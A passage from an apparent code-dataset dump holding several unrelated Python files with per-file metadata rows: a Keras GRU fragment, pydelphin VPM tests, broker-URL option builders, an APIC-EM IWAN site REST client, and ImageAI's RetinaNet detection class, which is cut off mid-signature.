    seq = keras.layers.TimeDistributed(keras.layers.Dense(units=128))(seq)
    seq = keras.layers.Bidirectional(
        keras.layers.GRU(units=128, return_sequences=True, dropout=0.5))(seq)
    output_data = keras.layers.TimeDistributed(
        keras.layers.Dense(units=output_shape, activation="softmax"))(seq)
    return (input_data, output_data)
| 46.080645
| 95
| 0.673521
| 1,572
| 11,428
| 4.785623
| 0.072519
| 0.166689
| 0.120962
| 0.103948
| 0.864682
| 0.864682
| 0.860827
| 0.860827
| 0.848863
| 0.826266
| 0
| 0.044542
| 0.15917
| 11,428
| 247
| 96
| 46.267206
| 0.73837
| 0.012951
| 0
| 0.727749
| 0
| 0
| 0.036507
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036649
| false
| 0
| 0.026178
| 0
| 0.099476
| 0.005236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad777552cc89034b8d30c3951a1ee4a89d47357a
| 8,697
|
py
|
Python
|
tests/vpm_test.py
|
arademaker/pydelphin
|
3ebcce48c4edcb4e797fc8e447a80e38e8fef53a
|
[
"MIT"
] | 60
|
2016-05-13T18:35:59.000Z
|
2021-07-13T03:05:23.000Z
|
tests/vpm_test.py
|
arademaker/pydelphin
|
3ebcce48c4edcb4e797fc8e447a80e38e8fef53a
|
[
"MIT"
] | 295
|
2015-10-07T17:02:33.000Z
|
2022-02-03T05:26:16.000Z
|
tests/vpm_test.py
|
arademaker/pydelphin
|
3ebcce48c4edcb4e797fc8e447a80e38e8fef53a
|
[
"MIT"
] | 21
|
2015-10-07T16:36:51.000Z
|
2020-11-15T07:46:34.000Z
|
from io import StringIO as S
import pytest
from delphin import vpm
def test_load(tmp_path):
    # The same VPM text must load both from a stream and from a file path.
    content = ('; test vpm\n'
               'a : b\n'
               ' 1 >> 2')
    vpm.load(S(content))
    vpmfile = tmp_path / 'test.vpm'
    vpmfile.write_text(content)
    vpm.load(vpmfile)
def test_invalid():
    # Each malformed VPM document must raise a syntax error on load.
    bad_documents = [
        '~~',
        '<>',
        'event >< e',
        'a : b\n 1 2 >> 3',
        'a : b\n 1 >> 2 3',
        'a b : c d\n 1 >> 2',
    ]
    for text in bad_documents:
        with pytest.raises(vpm.VPMSyntaxError):
            vpm.load(S(text))
def test_type_map_single_rule_no_semi():
    # Operators whose left-to-right direction maps 'event' to 'e', and those
    # that only map right-to-left (so the forward apply leaves it unchanged).
    forward_mapped = ('<>', '>>', '==', '=>')
    forward_unmapped = ('<<', '<=')
    all_ops = forward_mapped + forward_unmapped

    for op in forward_mapped:
        assert vpm.load(S('event %s e' % op)).apply('event2', {}) == ('e2', {})
    for op in forward_unmapped:
        assert vpm.load(S('event %s e' % op)).apply('event2', {}) == ('event2', {})

    # It turns out variable type mappings shouldn't apply in reverse..
    for op in all_ops:
        assert vpm.load(S('event %s e' % op)).apply('event2', {}, reverse=True) == ('event2', {})
    for op in all_ops:
        assert vpm.load(S('event %s e' % op)).apply('e2', {}) == ('e2', {})
    for op in all_ops:
        assert vpm.load(S('event %s e' % op)).apply('e2', {}, reverse=True) == ('e2', {})

    # Wildcard sources/targets.
    assert vpm.load(S('* >> a')).apply('event2', {}) == ('a2', {})
    assert vpm.load(S('semarg << *')).apply('event2', {}) == ('event2', {})
    assert vpm.load(S('semarg << *')).apply('a2', {}, reverse=True) == ('a2', {})
def test_type_map_multi_rule_no_semi():
    # (rules, variable, reverse, expected) — earlier rules win over later ones.
    # Note: variable type mappings shouldn't apply in reverse.
    cases = [
        ('event <> e\nref-ind <> x', 'event2', False, ('e2', {})),
        ('event <> e\nref-ind <> x', 'ref-ind4', False, ('x4', {})),
        ('event >> e\nevent >> wrong', 'event2', False, ('e2', {})),
        ('event >> e\ne >> wrong', 'event2', False, ('e2', {})),
        ('event << wrong\nevent >> e', 'event2', False, ('e2', {})),
        ('event >> e\nevent << u', 'event2', False, ('e2', {})),
        ('event >> e\nevent << u', 'e2', True, ('e2', {})),
        ('event >> e\nevent << u', 'u2', True, ('u2', {})),
        ('* <> *\n* >> wrong\nwrong << *', 'a2', False, ('a2', {})),
        ('* <> *\n* >> wrong\nwrong << *', 'a2', True, ('a2', {})),
    ]
    for rules, var, rev, expected in cases:
        assert vpm.load(S(rules)).apply(var, {}, reverse=rev) == expected
def test_type_map_single_with_semi():
    # TODO: add coverage for single-rule type maps when a SEM-I is provided.
    pass
def test_type_map_multi_with_semi():
    # TODO: add coverage for multi-rule type maps when a SEM-I is provided.
    pass
def test_prop_map_no_semi():
    def check(rules, cases):
        # Build one VPM and run every (variable, properties, reverse, expected)
        # case against it.
        m = vpm.load(S(rules))
        for var, props, rev, expected in cases:
            assert m.apply(var, props, reverse=rev) == expected

    # single feature, single bidirectional property
    check('E.TENSE : TENSE\n'
          ' present <> pres',
          [('event2', {'E.TENSE': 'present'}, False, ('event2', {'TENSE': 'pres'})),
           ('event2', {'E.TENSE': 'past'}, False, ('event2', {})),
           ('e2', {'TENSE': 'pres'}, False, ('e2', {})),
           ('e2', {'TENSE': 'pres'}, True, ('e2', {'E.TENSE': 'present'}))])

    # single feature, bidirectional wildcard
    check('E.TENSE : TENSE\n'
          ' present <> pres\n'
          ' * <> *',
          [('event2', {'E.TENSE': 'present'}, False, ('event2', {'TENSE': 'pres'})),
           ('event2', {'E.TENSE': 'past'}, False, ('event2', {'TENSE': 'past'})),
           ('e2', {'TENSE': 'pres'}, False, ('e2', {})),
           ('e2', {'TENSE': 'pres'}, True, ('e2', {'E.TENSE': 'present'})),
           ('e2', {'TENSE': 'past'}, True, ('e2', {'E.TENSE': 'past'}))])

    # one-to-many features
    check('PNG.PN : PERS NUM\n'
          ' 1sg <> 1 sg\n'
          ' 1pl <> 1 pl\n'
          ' 1per <> 1 !\n'
          ' 1per << 1 *\n'
          ' 3sg <> 3 sg\n'
          ' * >> ! !\n'
          ' ! << * *',
          [('event2', {'PNG.PN': '1sg'}, False, ('event2', {'PERS': '1', 'NUM': 'sg'})),
           ('event2', {'PNG.PN': '1pl'}, False, ('event2', {'PERS': '1', 'NUM': 'pl'})),
           ('event2', {'PNG.PN': '1per'}, False, ('event2', {'PERS': '1'})),
           ('event2', {'PNG.PN': '4du'}, False, ('event2', {})),
           ('e2', {'PERS': '1', 'NUM': 'sg'}, True, ('e2', {'PNG.PN': '1sg'})),
           ('e2', {'PERS': '1', 'NUM': 'pl'}, True, ('e2', {'PNG.PN': '1pl'})),
           ('e2', {'PERS': '1'}, True, ('e2', {'PNG.PN': '1per'})),
           ('e2', {'PERS': '1', 'NUM': 'du'}, True, ('e2', {'PNG.PN': '1per'})),
           ('e2', {'PERS': '4', 'NUM': 'du'}, True, ('e2', {}))])

    # var-type conditioned wildcard
    check('E.TENSE : TENSE\n'
          ' untensed << [e]',
          [('event2', {'E.TENSE': 'present'}, False, ('event2', {})),
           ('e2', {}, True, ('e2', {'E.TENSE': 'untensed'})),
           ('e2', {'TENSE': 'bogus'}, True, ('e2', {})),
           ('x4', {}, True, ('x4', {}))])

    # many-to-one features
    check('E.ASPECT.SOON E.ASPECT.EVER E.ASPECT.ALREADY : TENSE\n'
          ' bool bool + <> past\n'
          ' bool + bool <> nonpresent\n'
          ' + bool bool <> fut',
          [('event2', {'E.ASPECT.SOON': 'bool', 'E.ASPECT.EVER': 'bool', 'E.ASPECT.ALREADY': '+'}, False, ('event2', {'TENSE': 'past'})),
           ('event2', {'E.ASPECT.SOON': 'bool', 'E.ASPECT.EVER': '+', 'E.ASPECT.ALREADY': 'bool'}, False, ('event2', {'TENSE': 'nonpresent'})),
           ('event2', {'E.ASPECT.SOON': '+', 'E.ASPECT.EVER': 'bool', 'E.ASPECT.ALREADY': 'bool'}, False, ('event2', {'TENSE': 'fut'})),
           ('e2', {'TENSE': 'past'}, True, ('e2', {'E.ASPECT.SOON': 'bool', 'E.ASPECT.EVER': 'bool', 'E.ASPECT.ALREADY': '+'})),
           ('e2', {'TENSE': 'nonpresent'}, True, ('e2', {'E.ASPECT.SOON': 'bool', 'E.ASPECT.EVER': '+', 'E.ASPECT.ALREADY': 'bool'})),
           ('e2', {'TENSE': 'fut'}, True, ('e2', {'E.ASPECT.SOON': '+', 'E.ASPECT.EVER': 'bool', 'E.ASPECT.ALREADY': 'bool'}))])
def test_prop_map_with_semi():
    # TODO: add coverage for property maps when a SEM-I is provided.
    pass
| 52.077844
| 150
| 0.496838
| 1,120
| 8,697
| 3.826786
| 0.094643
| 0.09636
| 0.108259
| 0.150257
| 0.861176
| 0.794914
| 0.742184
| 0.716752
| 0.702053
| 0.624825
| 0
| 0.027137
| 0.211912
| 8,697
| 166
| 151
| 52.391566
| 0.598191
| 0.118317
| 0
| 0.198347
| 0
| 0
| 0.288497
| 0
| 0
| 0
| 0
| 0
| 0.53719
| 1
| 0.066116
| false
| 0.024793
| 0.024793
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad8c0c8b8c34c2ea1f14c24c109140498310c329
| 2,238
|
py
|
Python
|
optconstruct/types/composed/brokerurl.py
|
Frawless/option_parser
|
64ad95fe0840aafe3e74fddf3cb7687df86f7913
|
[
"Apache-2.0"
] | null | null | null |
optconstruct/types/composed/brokerurl.py
|
Frawless/option_parser
|
64ad95fe0840aafe3e74fddf3cb7687df86f7913
|
[
"Apache-2.0"
] | null | null | null |
optconstruct/types/composed/brokerurl.py
|
Frawless/option_parser
|
64ad95fe0840aafe3e74fddf3cb7687df86f7913
|
[
"Apache-2.0"
] | null | null | null |
"""
# TODO jstejska: Fill package info
"""
import copy
import reformat
from optconstruct.types import BasicComposed
class BrokerURLnodeJS(BasicComposed):
    """BrokerURL option construct class for nodeJS messaging client."""

    composed_keys = {'host'}

    def generate(self, data, client=None):
        """Generate option brokerURL option.

        :param data: data with specified option's values
        :type data: dict
        :param client: client's label
        :type client: str
        :return: option
        :rtype: str
        """
        _ = client  # the client label is not needed to build the URL
        # An explicitly supplied broker URL short-circuits URL construction.
        explicit_url = data.get('broker-url')
        if explicit_url is not None:
            return self.prefix + " " + explicit_url
        # Fold user/password into a single 'credentials' value when present;
        # deepcopy so the caller's data dict is never mutated.
        credentials = reformat.reformat("%{user|%s}%{password|:%s}", data)
        if not credentials:
            source = data
        else:
            source = copy.deepcopy(data)
            source['credentials'] = credentials
        pattern = self._postprocessing("%{credentials|%s@}%{host}%{port|:%s}")
        return self.prefix + " " + reformat.reformat(pattern, source)
class BrokerURLPythonProton(BasicComposed):
    """BrokerURL option parser for Proton-Python messaging client."""

    def generate(self, data, client=None):
        """Generate option brokerURL option.

        :param data: data with specified option's values
        :type data: dict
        :param client: client's label
        :type client: str
        :return: option
        :rtype: str
        """
        _ = client  # the client label is not needed to build the URL
        # An explicitly supplied broker URL short-circuits URL construction.
        explicit_url = data.get('broker-url')
        if explicit_url is not None:
            return self.prefix + " " + explicit_url
        # Fold user/password into a single 'credentials' value when present;
        # deepcopy so the caller's data dict is never mutated.
        credentials = reformat.reformat("%{user|%s}%{password|:%s}", data)
        if not credentials:
            source = data
        else:
            source = copy.deepcopy(data)
            source['credentials'] = credentials
        # Unlike the nodeJS variant, the address segment is appended here.
        pattern = self._postprocessing("%{credentials|%s@}%{host}%{port|:%s}%{address|/%s}")
        return self.prefix + " " + reformat.reformat(pattern, source)
| 27.292683
| 92
| 0.596962
| 241
| 2,238
| 5.431535
| 0.248963
| 0.110008
| 0.039725
| 0.05806
| 0.705118
| 0.705118
| 0.705118
| 0.705118
| 0.705118
| 0.705118
| 0
| 0
| 0.291332
| 2,238
| 81
| 93
| 27.62963
| 0.825347
| 0.227882
| 0
| 0.702703
| 0
| 0
| 0.117573
| 0.085967
| 0
| 0
| 0
| 0.012346
| 0
| 1
| 0.054054
| false
| 0.054054
| 0.081081
| 0
| 0.324324
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ad9695f04458f0dbc4bf34e22a12c97869a235ca
| 18,532
|
py
|
Python
|
apis/nb/clients/visibility_service_client/IwansiteApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts-
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 45
|
2016-06-09T15:41:25.000Z
|
2019-08-06T17:13:11.000Z
|
apis/nb/clients/visibility_service_client/IwansiteApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 36
|
2016-06-12T03:03:56.000Z
|
2017-03-13T18:20:11.000Z
|
apis/nb/clients/visibility_service_client/IwansiteApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 15
|
2016-06-22T03:51:37.000Z
|
2019-07-10T10:06:02.000Z
|
#!/usr/bin/env python
#pylint: skip-file
# This source code is licensed under the Apache license found in the
# LICENSE file in the root directory of this project.
import sys
import os
import urllib.request, urllib.parse, urllib.error
from .models import *
class IwansiteApi(object):
    """REST client for the APIC-EM visibility service ``/iwan/site`` endpoints.

    Every public method accepts its parameters as keyword arguments, validates
    them against the endpoint's accepted names, and delegates request assembly
    and dispatch to the shared ``_invoke`` helper (the nine endpoint methods
    previously duplicated that logic verbatim).
    """

    def __init__(self, apiClient):
        # apiClient must provide toPathValue(), callAPI() and deserialize().
        self.apiClient = apiClient

    def _invoke(self, methodName, kwargs, allParams, resourcePath, httpMethod,
                responseType, queryNames=(), pathNames=(), bodyName=None):
        """Validate kwargs, build one API request, and dispatch it.

        Args:
            methodName, str: public method name, used in the TypeError message
            kwargs, dict: caller-supplied keyword arguments
            allParams, list: keyword names accepted by the endpoint
            resourcePath, str: URL template, may contain {placeholders}
            httpMethod, str: HTTP verb (GET/POST/PUT/DELETE)
            responseType, str: model name passed to apiClient.deserialize
            queryNames, tuple: params sent as query-string values
            pathNames, tuple: params substituted into the URL template
            bodyName, str: param sent as the request body, if any
        Returns: the deserialized response object, or None on empty response
        Raises: TypeError if kwargs contains an unexpected keyword argument
        """
        for key in kwargs:
            if key not in allParams:
                raise TypeError(
                    "Got an unexpected keyword argument '%s' to method %s"
                    % (key, methodName))
        params = dict(kwargs)

        resourcePath = resourcePath.replace('{format}', 'json')
        queryParams = {}
        headerParams = {'Accept': 'application/json',
                        'Content-Type': 'application/json'}
        formParams = {}
        files = {}
        bodyParam = None

        for name in queryNames:
            if name in params:
                queryParams[name] = self.apiClient.toPathValue(params[name])
        # scope/username travel as headers on every endpoint that accepts them.
        for name in ('scope', 'username'):
            if name in allParams and name in params:
                headerParams[name] = params[name]
        for name in pathNames:
            if name in params:
                replacement = str(self.apiClient.toPathValue(params[name]))
                replacement = urllib.parse.quote(replacement)
                resourcePath = resourcePath.replace('{' + name + '}',
                                                    replacement)
        if bodyName is not None and bodyName in params:
            bodyParam = params[bodyName]

        # formParams is always empty here, so the body (possibly None) is sent.
        postData = (formParams if formParams else bodyParam)
        response = self.apiClient.callAPI(resourcePath, httpMethod, queryParams,
                                          postData, headerParams, files=files)
        if not response:
            return None
        return self.apiClient.deserialize(response, responseType)

    def getSiteBySiteNameAndType(self, **kwargs):
        """API to get the iwan site by siteName and/or siteType

        Args:
            siteName, str: Site Name (required)
            siteType, str: Site Type (required)
            scope, str: Authorization Scope for RBAC (required)
            username, str: requestorUsername (required)
        Returns: SiteDTOListResult
        """
        return self._invoke('getSiteBySiteNameAndType', kwargs,
                            ['siteName', 'siteType', 'scope', 'username'],
                            '/iwan/site', 'GET', 'SiteDTOListResult',
                            queryNames=('siteName', 'siteType'))

    def update(self, **kwargs):
        """API to update the site

        Args:
            siteDTO, SiteDTO: siteDTO (required)
            scope, str: Authorization Scope for RBAC (required)
            username, str: requestorUsername (required)
        Returns: TaskIdResult
        """
        return self._invoke('update', kwargs,
                            ['siteDTO', 'scope', 'username'],
                            '/iwan/site', 'PUT', 'TaskIdResult',
                            bodyName='siteDTO')

    def create(self, **kwargs):
        """API to create the site

        Args:
            siteDTO, SiteDTO: siteDTO (required)
            scope, str: Authorization Scope for RBAC (required)
            username, str: requestorUsername (required)
        Returns: TaskIdResult
        """
        return self._invoke('create', kwargs,
                            ['siteDTO', 'scope', 'username'],
                            '/iwan/site', 'POST', 'TaskIdResult',
                            bodyName='siteDTO')

    def delete(self, **kwargs):
        """API to delete the site by name

        Args:
            siteName, str: Site Name (required)
            scope, str: Authorization Scope for RBAC (required)
            username, str: requestorUsername (required)
        Returns: TaskIdResult
        """
        return self._invoke('delete', kwargs,
                            ['siteName', 'scope', 'username'],
                            '/iwan/site', 'DELETE', 'TaskIdResult',
                            queryNames=('siteName',))

    def getPrefix(self, **kwargs):
        """Get IWAN prefix(s) in a site

        Args:
            siteId, str: siteId (required)
            scope, str: Authorization Scope for RBAC (required)
        Returns: DCPrefixDTOListResult
        """
        # Note: this endpoint does not accept a 'username' argument.
        return self._invoke('getPrefix', kwargs,
                            ['siteId', 'scope'],
                            '/iwan/site/{siteId}/ip-prefix', 'GET',
                            'DCPrefixDTOListResult',
                            pathNames=('siteId',))

    def getDevice(self, **kwargs):
        """API to get the list of devices associated with the site

        Args:
            siteId, str: siteId (required)
            scope, str: Authorization Scope for RBAC (required)
            username, str: requestorUsername (required)
        Returns: SiteDeviceListResult
        """
        return self._invoke('getDevice', kwargs,
                            ['siteId', 'scope', 'username'],
                            '/iwan/site/{siteId}/network-device', 'GET',
                            'SiteDeviceListResult',
                            pathNames=('siteId',))

    def getSiteWanLinks(self, **kwargs):
        """Get the wan links connected to a specific site

        Args:
            siteId, str: siteId (required)
            scope, str: Authorization Scope for RBAC (required)
            username, str: requestorUsername (required)
        Returns: WanLinkDTOListResult
        """
        return self._invoke('getSiteWanLinks', kwargs,
                            ['siteId', 'scope', 'username'],
                            '/iwan/site/{siteId}/wan-link', 'GET',
                            'WanLinkDTOListResult',
                            pathNames=('siteId',))

    def getSiteBySiteId(self, **kwargs):
        """API to get the iwan site by instance UUID

        Args:
            siteInstanceUuid, str: siteInstanceUuid (required)
            scope, str: Authorization Scope for RBAC (required)
            username, str: requestorUsername (required)
        Returns: SiteDTOResult
        """
        return self._invoke('getSiteBySiteId', kwargs,
                            ['siteInstanceUuid', 'scope', 'username'],
                            '/iwan/site/{siteInstanceUuid}', 'GET',
                            'SiteDTOResult',
                            pathNames=('siteInstanceUuid',))

    def deleteSiteById(self, **kwargs):
        """API to delete the site by id

        Args:
            siteInstanceUuid, str: siteInstanceUuid (required)
            scope, str: Authorization Scope for RBAC (required)
            username, str: requestorUsername (required)
        Returns: TaskIdResult
        """
        return self._invoke('deleteSiteById', kwargs,
                            ['siteInstanceUuid', 'scope', 'username'],
                            '/iwan/site/{siteInstanceUuid}', 'DELETE',
                            'TaskIdResult',
                            pathNames=('siteInstanceUuid',))
| 26.323864
| 115
| 0.511763
| 1,451
| 18,532
| 6.533425
| 0.095796
| 0.038397
| 0.035865
| 0.027532
| 0.879641
| 0.879641
| 0.87173
| 0.87173
| 0.865401
| 0.858861
| 0
| 0
| 0.39046
| 18,532
| 703
| 116
| 26.361309
| 0.839235
| 0.130261
| 0
| 0.86711
| 0
| 0
| 0.157209
| 0.01289
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033223
| false
| 0
| 0.013289
| 0
| 0.109635
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f00bd0bbba4acd1cedbfe669b3a342a769e8c9e
| 46,399
|
py
|
Python
|
imageai/Detection/__init__.py
|
linxing58/ImageAI
|
93a6194261abe6123ab75206ae1cdf7143067889
|
[
"MIT"
] | null | null | null |
imageai/Detection/__init__.py
|
linxing58/ImageAI
|
93a6194261abe6123ab75206ae1cdf7143067889
|
[
"MIT"
] | null | null | null |
imageai/Detection/__init__.py
|
linxing58/ImageAI
|
93a6194261abe6123ab75206ae1cdf7143067889
|
[
"MIT"
] | null | null | null |
import cv2
from imageai.Detection.keras_retinanet.models.resnet import resnet50_retinanet
from imageai.Detection.keras_retinanet.utils.image import read_image_bgr, read_image_array, read_image_stream, preprocess_image, resize_image
from imageai.Detection.keras_retinanet.utils.visualization import draw_box, draw_caption
from imageai.Detection.keras_retinanet.utils.colors import label_color
import matplotlib.pyplot as plt
import matplotlib.image as pltimage
import numpy as np
import tensorflow as tf
import os
def get_session():
    """Return a TensorFlow session whose GPU memory allocation grows on demand."""
    session_config = tf.ConfigProto()
    session_config.gpu_options.allow_growth = True
    return tf.Session(config=session_config)
class ObjectDetection:
"""
This is the object detection class for images in the ImageAI library. It provides support for RetinaNet
object detection network . After instantiating this class, you can set it's properties and
make object detections using it's pre-defined functions.
The following functions are required to be called before object detection can be made
* setModelPath()
* At least one of the following and it must correspond to the model set in the setModelPath()
[setModelTypeAsRetinaNet()]
* loadModel() [This must be called once only before performing object detection]
Once the above functions have been called, you can call the detectObjectsFromImage() function of
the object detection instance object at anytime to obtain observable objects in any image.
"""
def __init__(self):
    # Model selection/loading state (name-mangled, private to this class).
    self.__modelType = ""
    self.modelPath = ""
    self.__modelPathAdded = False
    self.__modelLoaded = False
    self.__model_collection = []
    # NOTE(review): these defaults look swapped relative to loadModel(),
    # where detection_speed="normal" sets min=800 and max=1333 — confirm
    # intent. loadModel() overwrites both values before any detection runs.
    self.__input_image_min = 1333
    self.__input_image_max = 800
    # COCO class index -> label used when reporting detections.
    self.numbers_to_names = {0: 'person', 1: 'bicycle', 2: 'car', 3: 'motorcycle', 4: 'airplane', 5: 'bus', 6: 'train',
                             7: 'truck', 8: 'boat', 9: 'traffic_light', 10: 'fire_hydrant', 11: 'stop_sign', 12: 'parking_meter',
                             13: 'bench', 14: 'bird', 15: 'cat', 16: 'dog', 17: 'horse', 18: 'sheep', 19: 'cow', 20: 'elephant',
                             21: 'bear', 22: 'zebra', 23: 'giraffe', 24: 'backpack', 25: 'umbrella', 26: 'handbag', 27: 'tie',
                             28: 'suitcase', 29: 'frisbee', 30: 'skis', 31: 'snowboard', 32: 'sports_ball', 33: 'kite',
                             34: 'baseball_bat', 35: 'baseball_glove', 36: 'skateboard', 37: 'surfboard', 38: 'tennis_racket',
                             39: 'bottle', 40: 'wine glass', 41: 'cup', 42: 'fork', 43: 'knife', 44: 'spoon', 45: 'bowl',
                             46: 'banana', 47: 'apple', 48: 'sandwich', 49: 'orange', 50: 'broccoli', 51: 'carrot', 52: 'hot dog',
                             53: 'pizza', 54: 'donut', 55: 'cake', 56: 'chair', 57: 'couch', 58: 'potted_plant', 59: 'bed',
                             60: 'dining_table', 61: 'toilet', 62: 'tv', 63: 'laptop', 64: 'mouse', 65: 'remote', 66: 'keyboard',
                             67: 'cell_phone', 68: 'microwave', 69: 'oven', 70: 'toaster', 71: 'sink', 72: 'refrigerator',
                             73: 'book', 74: 'clock', 75: 'vase', 76: 'scissors', 77: 'teddy bear', 78: 'hair drier',
                             79: 'toothbrush'}
def setModelTypeAsRetinaNet(self):
    """
    Mark this detection instance as using the RetinaNet model.

    Must be called before loadModel().
    :return: None
    """
    self.__modelType = "retinanet"
def setModelPath(self, model_path):
    """
    Record the file path to the COCO-trained RetinaNet weights.

    Only the first call has an effect; later calls are silently ignored.
    :param model_path: path to the model weights file
    :return: None
    """
    if not self.__modelPathAdded:
        self.modelPath = model_path
        self.__modelPathAdded = True
def loadModel(self, detection_speed="normal"):
    """
    Build the RetinaNet model and load its weights from the configured path.

    The optional detection_speed selects an input-resize profile that trades
    detection count for speed. Unrecognized values leave the current resize
    bounds unchanged.
    :param detection_speed: one of "normal", "fast", "faster", "fastest", "flash"
    :return: None
    :raises ValueError: if no model type was set before loading
    """
    # (min_side, max_side) resize bounds per speed profile.
    speed_profiles = {
        "normal": (800, 1333),
        "fast": (400, 700),
        "faster": (300, 500),
        "fastest": (200, 350),
        "flash": (100, 250),
    }
    if detection_speed in speed_profiles:
        self.__input_image_min, self.__input_image_max = speed_profiles[detection_speed]
    if not self.__modelLoaded:
        if self.__modelType == "":
            raise ValueError("You must set a valid model type before loading the model.")
        elif self.__modelType == "retinanet":
            model = resnet50_retinanet(num_classes=80)
            model.load_weights(self.modelPath)
            self.__model_collection.append(model)
            self.__modelLoaded = True
def detectObjectsFromImage(self, input_image="", output_image_path="", input_type="file", output_type="file", extract_detected_objects = False, minimum_percentage_probability = 50):
    """
    Detect COCO objects in a single image with the loaded RetinaNet model.

    :param input_image: file path, numpy array or file stream of the image (interpreted per input_type)
    :param output_image_path: path for the annotated image (used only when output_type == "file")
    :param input_type: "file", "array" or "stream" -- how input_image is read
    :param output_type: "file" or "array" -- how the annotated image is delivered
    :param extract_detected_objects: if True, each detection is also cropped out individually
    :param minimum_percentage_probability: minimum confidence (in percent) for a detection to be kept
    :return: depending on output_type / extract_detected_objects:
        - "file",  not extracting: output_objects_array
        - "array", not extracting: detected_copy, output_objects_array
        - "file",  extracting:     output_objects_array, detected_objects_image_array
        - "array", extracting:     detected_copy, output_objects_array, detected_objects_image_array
      where output_objects_array is a list of {"name", "percentage_probability"} dicts and
      detected_objects_image_array holds either crop file paths or crop numpy arrays.
    :raises ValueError: if the model is not loaded, or if reading/processing the image fails.
    """
    if not self.__modelLoaded:
        raise ValueError("You must call the loadModel() function before making object detection.")
    try:
        output_objects_array = []
        detected_objects_image_array = []
        if input_type == "file":
            image = read_image_bgr(input_image)
        elif input_type == "array":
            image = read_image_array(input_image)
        elif input_type == "stream":
            image = read_image_stream(input_image)
        # Two RGB copies: one to draw annotations on, one pristine for crops.
        detected_copy = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2RGB)
        detected_copy2 = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2RGB)
        image = preprocess_image(image)
        image, scale = resize_image(image, min_side=self.__input_image_min, max_side=self.__input_image_max)
        model = self.__model_collection[0]
        _, _, detections = model.predict_on_batch(np.expand_dims(image, axis=0))
        predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)
        scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]
        # Map box coordinates back to the original (un-resized) image.
        detections[0, :, :4] /= scale
        min_probability = minimum_percentage_probability / 100
        # Hoisted out of the per-detection loop (was recomputed/re-checked each iteration).
        objects_dir = output_image_path + "-objects"
        if extract_detected_objects and output_type == "file" and not os.path.exists(objects_dir):
            os.mkdir(objects_dir)
        counting = 0
        for index, (label, score) in enumerate(zip(predicted_numbers, scores)):
            if score < min_probability:
                continue
            counting += 1
            color = label_color(label)
            detection_details = detections[0, index, :4].astype(int)
            draw_box(detected_copy, detection_details, color=color)
            caption = "{} {:.3f}".format(self.numbers_to_names[label], (score * 100))
            draw_caption(detected_copy, detection_details, caption)
            each_object_details = {}
            each_object_details["name"] = self.numbers_to_names[label]
            each_object_details["percentage_probability"] = str(score * 100)
            output_objects_array.append(each_object_details)
            if extract_detected_objects:
                # Crop from the pristine copy so annotations never leak into crops.
                splitted_copy = detected_copy2.copy()[detection_details[1]:detection_details[3],
                                detection_details[0]:detection_details[2]]
                if output_type == "file":
                    splitted_image_path = os.path.join(objects_dir, self.numbers_to_names[label] + "-" + str(
                        counting) + ".jpg")
                    pltimage.imsave(splitted_image_path, splitted_copy)
                    detected_objects_image_array.append(splitted_image_path)
                elif output_type == "array":
                    detected_objects_image_array.append(splitted_copy)
        if output_type == "file":
            pltimage.imsave(output_image_path, detected_copy)
        if extract_detected_objects:
            if output_type == "file":
                return output_objects_array, detected_objects_image_array
            elif output_type == "array":
                return detected_copy, output_objects_array, detected_objects_image_array
        else:
            if output_type == "file":
                return output_objects_array
            elif output_type == "array":
                return detected_copy, output_objects_array
    except Exception as e:
        # Narrowed from a bare `except:` and chained, so the underlying
        # traceback is preserved instead of being silently discarded.
        raise ValueError("Ensure you specified correct input image, input type, output type and/or output image path ") from e
def CustomObjects(self, person=False, bicycle=False, car=False, motorcycle=False, airplane=False,
                  bus=False, train=False, truck=False, boat=False, traffic_light=False, fire_hydrant=False, stop_sign=False,
                  parking_meter=False, bench=False, bird=False, cat=False, dog=False, horse=False, sheep=False, cow=False, elephant=False, bear=False, zebra=False,
                  giraffe=False, backpack=False, umbrella=False, handbag=False, tie=False, suitcase=False, frisbee=False, skis=False, snowboard=False,
                  sports_ball=False, kite=False, baseball_bat=False, baseball_glove=False, skateboard=False, surfboard=False, tennis_racket=False,
                  bottle=False, wine_glass=False, cup=False, fork=False, knife=False, spoon=False, bowl=False, banana=False, apple=False, sandwich=False, orange=False,
                  broccoli=False, carrot=False, hot_dog=False, pizza=False, donot=False, cake=False, chair=False, couch=False, potted_plant=False, bed=False,
                  dining_table=False, toilet=False, tv=False, laptop=False, mouse=False, remote=False, keyboard=False, cell_phone=False, microwave=False,
